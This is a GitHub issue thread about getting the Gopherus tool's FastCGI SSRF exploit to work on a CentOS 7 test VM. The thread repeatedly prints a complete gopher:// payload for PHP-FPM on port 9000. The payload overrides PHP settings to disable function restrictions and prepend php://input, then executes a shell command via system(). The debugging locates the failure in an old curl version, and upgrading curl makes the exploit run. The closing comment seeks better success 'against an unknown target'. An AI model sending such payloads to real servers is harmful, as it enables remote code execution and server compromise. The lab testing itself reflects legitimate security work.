New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

fastcgi exploit not executing successfully - CentOS 7 #5

Closed
mpchadwick opened this Issue Jan 30, 2019 · 9 comments

Comments

Projects
None yet
2 participants
@mpchadwick
Copy link

mpchadwick commented Jan 30, 2019

Hi,

I've been testing the fastcgi exploit in a local VM but unable to get it to to work.

PHP-FPM is listening on port 9000

[vagrant@localhost ~]$ netstat -tunapl | grep 9000
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:56488         127.0.0.1:9000          TIME_WAIT   -

[vagrant@localhost ~]$ sudo grep -ri listen /etc/php-fpm.d/www.conf
; - 'listen' (unixsocket)
;   'ip.add.re.ss:port'    - to listen on a TCP socket to a specific address on
;   'port'                 - to listen on a TCP socket to all addresses on a
;   '/path/to/unix/socket' - to listen on a unix socket.
listen = 127.0.0.1:9000
; Set listen(2) backlog.
;listen.backlog = 128
;listen.owner = nobody
listen.owner = apache
;listen.group = nobody
listen.group = apache
listen.mode = 0660
; PHP FCGI (5.2.2+). Makes sense only with a tcp listening socket. Each address
listen.allowed_clients = 127.0.0.1
;   listen queue         - the number of request in the queue of pending
;                          connections (see backlog in listen(2));
;   max listen queue     - the maximum number of requests in the queue
;   listen queue len     - the size of the socket queue of pending connections;
;   listen queue:         0
;   max listen queue:     1
;   listen queue len:     42

I've generated the payload an executed as follows

[vagrant@localhost Gopherus]$ pwd
/home/vagrant/Gopherus
[vagrant@localhost Gopherus]$ cat index.php
<?php

echo 'HELLO WORLD' . PHP_EOL;
[vagrant@localhost Gopherus]$ gopherus --exploit fastcgi


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

        author: $_SpyD3r_$

Give one file name which should be surely present in the server (prefer .php file)
if you don't know press ENTER we have default one:  /home/vagrant/Gopherus/index.php
Terminal command to run:  ls

Your gopher link is ready to do SSRF:

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0D%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%20SCRIPT_FILENAME/home/vagrant/Gopherus/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

-----------Made-by-SpyD3r-----------
[vagrant@localhost Gopherus]$ curl -v gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0D%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%20SCRIPT_FILENAME/home/vagrant/Gopherus/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
* About to connect() to 127.0.0.1 port 9000 (#0)
*   Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 9000 (#0)

curl just hangs until I eventually send it a SIGINT.

Any help would be much appreciated.

@mpchadwick

This comment has been minimized.

Copy link
Author

mpchadwick commented Jan 30, 2019

I used tcpdump to capture the activity with the curl and compared it to a tcpdump when accessing a webpage in Wireshark. It seems the packets are not being considered properly formed fastcgi. On the page that's working the 4th packet shows in Wireshark as "FCGI_BEGIN_REQUEST", however when sending the payload generated here it says "TCP segment of a reassembled PDU"

image

@tarunkant

This comment has been minimized.

Copy link
Owner

tarunkant commented Jan 30, 2019

Hey, I think it's a problem with your FastCGI installation because it's working fine for me(also try with default file I added). Also, can you try telnet 127.0.0.1 9000 and see if it gets connected.
image

@mpchadwick

This comment has been minimized.

Copy link
Author

mpchadwick commented Jan 30, 2019

Telnet connects fine.

[vagrant@localhost ~]$ telnet 127.0.0.1 9000
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Connection closed by foreign host.

I'm thinking it may actually be an issue with the cURL version I'm using. I looked at the tcp packet in Wireshark more closely and found that it only contains the 01 01 in the FCGI_BEGIN_REQUEST and then gets cut off (you'll notice the length is 68 of the curl that isn't working whereas it's 82 when I have the request get delivered via Apache mod_proxy_fcgi). It seems like curl is not delivering the TCP packets to fastcgi as expected.

Out of curiosity, which Linux distro / curl version are you testing.

Here are the specs of where I'm testing:

[vagrant@localhost ~]$ cat /etc/*release*
CentOS Linux release 7.3.1611 (Core)
Derived from Red Hat Enterprise Linux 7.3 (Source)
NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"

CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"

CentOS Linux release 7.3.1611 (Core)
CentOS Linux release 7.3.1611 (Core)
cpe:/o:centos:centos:7
[vagrant@localhost ~]$ uname -r
3.10.0-514.el7.x86_64
[vagrant@localhost ~]$ curl --version
curl 7.29.0 (x86_64-redhat-linux-gnu) libcurl/7.29.0 NSS/3.36 zlib/1.2.7 libidn/1.28 libssh2/1.4.3
Protocols: dict file ftp ftps gopher http https imap imaps ldap ldaps pop3 pop3s rtsp scp sftp smtp smtps telnet tftp
Features: AsynchDNS GSS-Negotiate IDN IPv6 Largefile NTLM NTLM_WB SSL libz unix-sockets
[vagrant@localhost ~]$ sudo yum info curl
Loaded plugins: fastestmirror
http://repo.varnish-cache.org/redhat/varnish-4.1/el7/repodata/repomd.xml: [Errno 14] HTTPS Error 404 - Not Found
Trying other mirror.
To address this issue please refer to the below knowledge base article

https://access.redhat.com/articles/1320623

If above article doesn't help to resolve this issue please create a bug on https://bugs.centos.org/

Loading mirror speeds from cached hostfile
 * base: centos-distro.cavecreek.net
 * epel: mirror.team-cymru.com
 * extras: mirror.net.cen.ct.gov
 * ius: mirror.its.dal.ca
 * updates: ftpmirror.your.org
Installed Packages
Name        : curl
Arch        : x86_64
Version     : 7.29.0
Release     : 51.el7
Size        : 528 k
Repo        : installed
From repo   : base
Summary     : A utility for getting files from remote servers (FTP, HTTP, and others)
URL         : http://curl.haxx.se/
License     : MIT
Description : curl is a command line tool for transferring data with URL syntax, supporting
            : FTP, FTPS, HTTP, HTTPS, SCP, SFTP, TFTP, TELNET, DICT, LDAP, LDAPS, FILE, IMAP,
            : SMTP, POP3 and RTSP.  curl supports SSL certificates, HTTP POST, HTTP PUT, FTP
            : uploading, HTTP form based upload, proxies, cookies, user+password
            : authentication (Basic, Digest, NTLM, Negotiate, kerberos...), file transfer
            : resume, proxy tunneling and a busload of other useful tricks.

[vagrant@localhost ~]$
@tarunkant

This comment has been minimized.

Copy link
Owner

tarunkant commented Jan 30, 2019

Hey, Here are my specs:
image

@mpchadwick mpchadwick changed the title fastcgi exploit not executing successfully fastcgi exploit not executing successfully - CentOS 7 Jan 31, 2019

@mpchadwick

This comment has been minimized.

Copy link
Author

mpchadwick commented Jan 31, 2019

Payload worked on my Mac, so definitely seems to be an issue with the CentOS environment I was testing in / version of cURL.

curl -v gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0D%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%20SCRIPT_FILENAME/home/vagrant/Gopherus/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 9000 (#0)
Primary script unknown
kStatus: 404 Not Found
X-Powered-By: PHP/7.1.24
Content-type: text/html; charset=UTF-8

File not found.
* Closing connection 0
-ee%

I've changed the title of the issue to note that it seems to be specific to CentOS (7) and curl that comes with CentOS 7. Not sure if you want to keep this issue open or not?

@tarunkant

This comment has been minimized.

Copy link
Owner

tarunkant commented Jan 31, 2019

I didn't try with CentOS, I will see the problem.
Letting it open for now.
Can you try to upgrade your curl and try, let me know if it works

@mpchadwick

This comment has been minimized.

Copy link
Author

mpchadwick commented Jan 31, 2019

It works after upgrading curl with these instructions:

https://qiita.com/tkprof/items/5460b8d603cbbc542c8c

[vagrant@localhost Gopherus]$ curl gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0D%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%20SCRIPT_FILENAME/home/vagrant/Gopherus/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00 --output -
Primary script unknown
kStatus: 404 Not Found
X-Powered-By: PHP/7.0.17
Content-type: text/html; charset=UTF-8

File not found.

@tarunkant

This comment has been minimized.

Copy link
Owner

tarunkant commented Feb 1, 2019

Great, Then I think we can close this issue.

@tarunkant tarunkant closed this Feb 4, 2019

@mpchadwick

This comment has been minimized.

Copy link
Author

mpchadwick commented Feb 5, 2019

I'm not sure if it's possible, but I think it would be interesting to see if there was a way to send a valid payload for CentOS 7 (and 6)'s out-of-box curl. That would help improve the success rate against an unknown target.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment